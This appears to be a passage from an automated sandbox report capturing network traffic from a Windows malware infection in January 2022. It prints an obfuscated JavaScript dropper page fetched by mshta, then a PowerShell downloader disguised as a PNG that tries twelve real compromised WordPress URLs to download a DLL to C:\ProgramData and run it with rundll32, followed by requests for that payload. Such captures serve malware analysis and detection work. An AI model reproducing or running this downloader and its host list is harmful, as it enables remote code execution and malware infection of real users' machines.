                                                                                                                    Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 76 4c 47 34 38 37 51 32 66 62 6e 57 62 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 64 33 66 55 68 51 42 66 55 57 33 30 33 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 64 33 66 55 68 51 42 66 55 57 33 30 33 5b 30 5d 3d 27 63 5c 31 36 31 5c 31 37 31 52 25 35 30 25 33 32 65 25 33 37 27 20 20 20 3b 76 4c 47 34 38 37 51 32 66 62 6e 57 62 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 5c 5c 7f 31 7f 36 7f 36 7f 61 7f 72 7f 25 7f 32 7f 30 7f 25 7f 37 7f 31 7f 79 7f 25 7f 33 7f 37 7d 25 7f 44 7d 1e 7d 5c 27 7f 32 7d 5c 27 7f 33 7f 42 7f 71 7d 18 7d 22 7d 25 7f 38 7d 28 7f 25 7f 35 7f 33 7d 21 7f 34 7d 21 7f 32 7f 25 7f 36 7f 39 7f 6e 7f 67 7d 1e 7f 45 7d 3d 7f 36 7f 72 7f 6f 7d 18 7f 35 7f 35
                                                                                                                    Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'\\166ar%20%71y%37}%D}}\'2}\'3Bq}}"}%8}(%53}!4}!2%69ng}E}=6ro}55
                                                                                                                    Jan 28, 2022 21:07:54.750797987 CET3INData Raw: 7f 25 7f 34 7f 33 7d 48 7f 30 7f 61 7d 18 7f 36 7f 32 7f 43 7d 3d 7f 46 7d 18 7f 34 7f 34 7f 65 7d 1e 7d 34 7f 33 7f 31 7d 25 7d 38 7d 53 7d 25 7d 5e 7f 33 7d 20 7f 32 7f 39 7d 25 7f 42 7d 44 7e 48 7d 5b 7f 69 7d 35 7d 64 7d 68 7d 48 7d 63 7d 54
                                                                                                                    Data Ascii: %43}H0a}62C}=F}44e}}431}%}8}S}%}^3} 29}%B}D~H}[i}5}d}h}H}c}T3}<}]}%6}b}h}=}g2}i}}}}g7}/}$}&}}i3})}"}1}c}47})}.}Du}H}x6}M}4~_}0}Q1|}w}[|za}!B}qf| 2}^64}H}\'||1}Ient}Bdo}=|6}J6D}W5|t}|/
                                                                                                                    Jan 28, 2022 21:07:54.750813007 CET4INData Raw: 7f 3a 7f 20 7f 56 79 65 7f 64 7e 2e 7f 61 7f 2c 7f 20 7b 64 7f 69 7e 36 78 68 7f 48 7f 65 7f 6c 7f 76 79 7a 61 7f 69 7f 63 78 67 78 52 7e 2e 7f 73 7f 2d 79 64 7d 06 7f 66 7f 3b 7f 20 78 58 78 79 7f 69 7f 7a 7f 65 78 61 7f 31 7f 32 7f 70 7f 78 78
                                                                                                                    Data Ascii: : Vyed~.a, {di~6xhHelvyzaicxgxR~.s-yd}f; xXxyizexa12pxx}x9x;rxa#Fwwx}backg}F}d-w\n~Hw\rx?6xA>ThexRourym x9|D of this paz w4w6}F|fc|fx6by <b~gxXxRxTxVxJx:w wFCCw!~#~% G
                                                                                                                    Jan 28, 2022 21:07:54.750830889 CET6INData Raw: 33 30 25 32 43 5c 31 35 34 69 25 33 44 25 32 37 25 32 37 25 33 42 5c 31 34 34 25 36 46 25 37 42 25 36 43 25 33 39 25 33 44 6c 25 33 34 25 32 45 63 5c 31 35 30 5c 31 34 31 25 37 32 43 25 36 46 5c 31 34 34 65 5c 31 30 31 5c 31 36 34 25 32 38 25 35
                                                                                                                    Data Ascii: 30%2C\154i%3D%27%27%3B\144%6F%7B%6C%39%3Dl%34%2Ec\150\141%72C%6F\144e\101\164%28%5F%31%29%3B\154%49%3Dl%34' ;function j51ONw04kefg6ni(v7DA2n1){cvpCeE6r5+=v7DA2n1};vLG487Q2fbnWb[0]+='%|fxxY|Dx9~-~2~4xan~4ewwMwwOwwRxA~refx%~p~@/~Bw
                                                                                                                    Jan 28, 2022 21:07:54.750864029 CET7INData Raw: 7f 49 74 60 72 0c 72 5c 72 74 19 7f 65 7f 77 78 69 74 6e 76 2c 7d 16 7f 62 76 5a 76 36 7f 42 7f 65 7f 67 76 16 7f 5c 27 7f 2c 7f 5c 27 7f 61 7f 66 76 5c 27 71 0c 71 0e 72 6c 71 11 71 09 73 4d 7f 65 7a 12 7f 64 71 10 71 12 71 14 79 65 71 1d 78 07
                                                                                                                    Data Ascii: It`rr\rtewxitnv,}bvZv6Begv\',\'afv\'qqrlqqsMezdqqqyeqxr$rV}q{d~-y}~Wqw$}qx,dyqaqvgqw[vqsMviqu=sqs!q7nputqpq$rCr&s%ruBsx!tv2(qMsZxtyd~\':s%uEq\'qq*({,qcqesF7qgqiqdqjqhqkuBwd}zak;
                                                                                                                    Jan 28, 2022 21:07:54.750894070 CET8INData Raw: 3b 65 47 63 71 64 34 49 52 37 42 78 55 2b 3d 27 25 32 45 25 36 33 68 5c 31 34 31 72 5c 31 30 33 6f 5c 31 34 34 5c 31 34 35 41 5c 31 36 34 25 32 38 25 32 42 25 32 42 25 35 46 25 33 31 25 32 39 25 33 42 5c 31 35 34 25 33 37 25 35 42 5c 31 31 31 25
                                                                                                                    Data Ascii: ;eGcqd4IR7BxU+='%2E%63h\141r\103o\144\145A\164%28%2B%2B%5F%31%29%3B\154%37%5B\111%2B%2B%5D%3DlI%2B\151l%2D%28l%39%3C%3C%37%29%7D\167hile%28%5F%31%2B%2B%3Cl%38%29%3B%76%61\162%20l%31%3D\156e%77%20%41\162ray%28%29%2Cl%30%3D%6E%65%77%20A%72ray%28
                                                                                                                    Jan 28, 2022 21:07:54.750911951 CET10INData Raw: 37 76 16 78 7a 7f 74 7f 41 79 6a 77 14 79 06 77 7c 6f 5c 5c 72 5c 72 7f 5b 7f 70 6f 01 6d 74 7f 7d 78 6f 71 5a 74 61 7f 63 76 5b 6e 32 70 11 7c 66 7f 52 7e 2e 7a 7f 74 2d 76 67 6c 15 7f 65 73 42 78 4c 76 46 77 59 7f 6c 7f 46 7e 2d 7f 67 75 48 7f
                                                                                                                    Data Ascii: 7vxztAyjwyw|o\\r\r[pomt}xoqZtacv[n2p|fR~.zt-vglesBxLvFwYlF~-guH(mtsRt7p=t?m~nYmtn]lzayetqq(w)f,nlthoMl+=m{m~/l4l6v6l8ll;s;iv(tmnl>l,rlBnPnEnRmlHflPl*l,rlTmyn\\|DsllFvYlYlJ}vFSixs9pRojm#oEuunm
                                                                                                                    Jan 28, 2022 21:07:54.750930071 CET11INData Raw: 76 15 68 73 68 67 68 7a 61 7c 31 67 0c 68 6d 7f 74 7f 29 7f 2e 7f 44 67 10 68 1f 7f 7d 75 55 67 16 68 11 7f 6e 7f 6c 67 1a 68 0c 68 56 7f 6f 68 77 68 3c 68 79 68 3f 68 66 68 6d 68 7c 68 44 69 4c 7f 47 7f 4e 67 03 7f 49 7f 60 7f 45 7f 60 7f 58 69
                                                                                                                    Data Ascii: vhshghza|1ghmt).Dgh}uUghnlghhVohwh<hyh?hfhmh|hDiLGNgI`E`XirJI|g.g0X~;+iq~;g*Ag$g4u_ispg,is3icJovhCuBhAGgQHAgUg?xHhG g;ggZ ing]gRg`NiLWSips?sN87) &g^hgirg]"rg]kiSxqv(x.~>iuAg]gh(8
                                                                                                                    Jan 28, 2022 21:07:54.750945091 CET12INData Raw: 32 42 25 32 42 25 32 39 25 37 42 6c 5c 31 31 37 25 32 42 25 33 44 5c 31 35 34 25 33 33 25 32 38 25 37 36 4c 47 25 33 34 25 33 38 25 33 37 25 35 31 25 33 32 25 36 36 5c 31 34 32 6e 57 25 36 32 25 35 42 69 25 36 39 25 35 44 25 32 39 25 37 44 25 33
                                                                                                                    Data Ascii: 2B%2B%29%7Bl\117%2B%3D\154%33%28%76LG%34%38%37%51%32%66\142nW%62%5Bi%69%5D%29%7D%3Bc%36%37f%39%66%28%29%3B' ;</script>...sg7gE7Jx81m00g1--><script>m5Ji2CvQ4Or ='OFdlOOxYOmZwVxameISxuCoRhhIbUOOMOUgDRyOOauvhWKKUidsTgVDqXOimIEL' ;kefg6n


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.2.224916891.240.118.16880C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:08:00.606825113 CET13OUTGET /qqw/aas/se.png HTTP/1.1
                                                                                                                    Host: 91.240.118.168
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:08:00.666024923 CET14INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.1
                                                                                                                    Date: Fri, 28 Jan 2022 20:08:00 GMT
                                                                                                                    Content-Type: image/png
                                                                                                                    Content-Length: 1178
                                                                                                                    Last-Modified: Wed, 26 Jan 2022 22:58:47 GMT
                                                                                                                    Connection: keep-alive
                                                                                                                    ETag: "61f1d227-49a"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 6b 75 79 70 6f 72 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 58 53 73 35 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6a 65 66 66 72 65 79 6c 75 62 69 6e 2e 69 67 63 6c 6f 75 74 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 76 7a 4f 47 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 66 6c 79 62 75 73 74 72 61 76 65 6c 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 32 54 6a 55 48 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 64 6f 63 73 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 4a 4a 45 66 30 6b 45 41 35 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 77 61 6c 6c 61 63 65 62 72 61 64 6c 65 79 2e 63 6f 6d 2f 63 73 73 2f 59 63 44 63 39 32 37 53 4a 52 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 73 3a 2f 2f 61 6c 67 7a 6f 72 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 67 68 46 58 56 72 47 4c 45 68 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 70 63 6f 76 65 73 74 75 64 69 6f 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 33 7a 67 52 69 32 77 58 77 43 62 64 53 44 33 69 7a 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 6d 61 72 74 69 6e 73 61 6e 63 68 65 7a 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 51 70 46 44 4a 50 4d 59 34 39 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 6c 72 6f 69 65 79 65 63 65 6e 74 72 65 2e 6f 72 67 2f 63 67 69 2d 62 69 6e 2f 6c 34 32 73 6c 67 6d 66 38 6e 42 70 55 59 73 62 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 62 6c 75 77 6f 6d 2d 6d 69 6c 61 6e 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 46 45 6a 33 79 34 7a 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 68 61 69 72 65 70 6f 72 74 63 68 61 6e 6e 65 6c 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 4b 61 57 5a 70 30 6f 64 6b 45 4f 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 73 61 63 69 2d 65 67 79 70 74 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 57 37 71 58 56 65 47 70 2f 27 3b 0d 0a 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d
                                                                                                                    Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://kuyporn.com/wp-content/XSs5/';$url2 = 'http://jeffreylubin.igclout.com/wp-admin/vzOG/';$url3 = 'http://flybustravel.com/cgi-bin/2TjUH/';$url4 = 'http://docs-construction.com/wp-admin/JJEf0kEA5/';$url5 = 'http://wallacebradley.com/css/YcDc927SJR/';$url6 = 'https://algzor.com/wp-includes/ghFXVrGLEh/';$url7 = 'https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/';$url8 = 'https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/';$url9 = 'https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/';$url10 = 'https://bluwom-milano.com/wp-content/FEj3y4z/';$url11 = 'https://thaireportchannel.com/wp-includes/KaWZp0odkEO/';$url12 = 'https://esaci-egypt.com/wp-includes/W7qXVeGp/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -
                                                                                                                    Jan 28, 2022 21:08:00.666033983 CET14INData Raw: 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 27 2c 41 41 44 44 3b 0d 0a 0d 0a
                                                                                                                    Data Ascii: s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\ProgramData\QWER.dll',AADD;


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.2.2249169172.67.149.20980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:08:00.758121967 CET15OUTGET /wp-content/XSs5/ HTTP/1.1
                                                                                                                    Host: kuyporn.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:08:00.788583994 CET16INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 20:08:00 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=196bAQ8r8ZVEf4%2FBws8sWDllYGc7kwE%2BeWUFc%2B8GsjlSfhPXLsUqDPgq%2F268jjAl%2BISm%2BkaCE3Nce9nB%2Fsjj%2FbZi0q2ruqImQHzOOXrK%2FmMw%2Fqg3p%2FntjMtQDSbsQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 6d4cd9accd886964-FRA
                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                    Data Raw: 31 30 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f
                                                                                                                    Data Ascii: 10dc<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/
                                                                                                                    Jan 28, 2022 21:08:00.788609982 CET18INData Raw: 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 2c 70 72 6f 6a 65 63 74 69 6f 6e 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39
                                                                                                                    Data Ascii: styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]--><style type="text
                                                                                                                    Jan 28, 2022 21:08:00.788625956 CET19INData Raw: 6e 20 66 6c 61 67 67 65 64 20 61 73 20 70 68 69 73 68 69 6e 67 2e 20 50 68 69 73 68 69 6e 67 20 69 73 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 61 63 71 75 69 72 65 20 70 65 72 73 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68
                                                                                                                    Data Ascii: n flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GE
                                                                                                                    Jan 28, 2022 21:08:00.788640976 CET20INData Raw: 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 30 20 73 6d 3a 70 79 2d 34 20 73 6d 3a 70 78 2d 38 20 6d 78 2d 61 75 74 6f 20 74 65 78 74 2d 63 65 6e 74 65 72 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62
                                                                                                                    Data Ascii: 40 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">6d4cd
                                                                                                                    Jan 28, 2022 21:08:00.788652897 CET20INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    3192.168.2.224917074.208.236.15780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:08:01.508800030 CET21OUTGET /wp-admin/vzOG/ HTTP/1.1
                                                                                                                    Host: jeffreylubin.igclout.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:08:01.720765114 CET22INHTTP/1.1 200 OK
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Length: 557056
                                                                                                                    Connection: keep-alive
                                                                                                                    Keep-Alive: timeout=15
                                                                                                                    Date: Fri, 28 Jan 2022 20:08:01 GMT
                                                                                                                    Server: Apache
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Fri, 28 Jan 2022 20:08:01 GMT
                                                                                                                    Content-Disposition: attachment; filename="v3Q.dll"
                                                                                                                    Content-Transfer-Encoding: binary
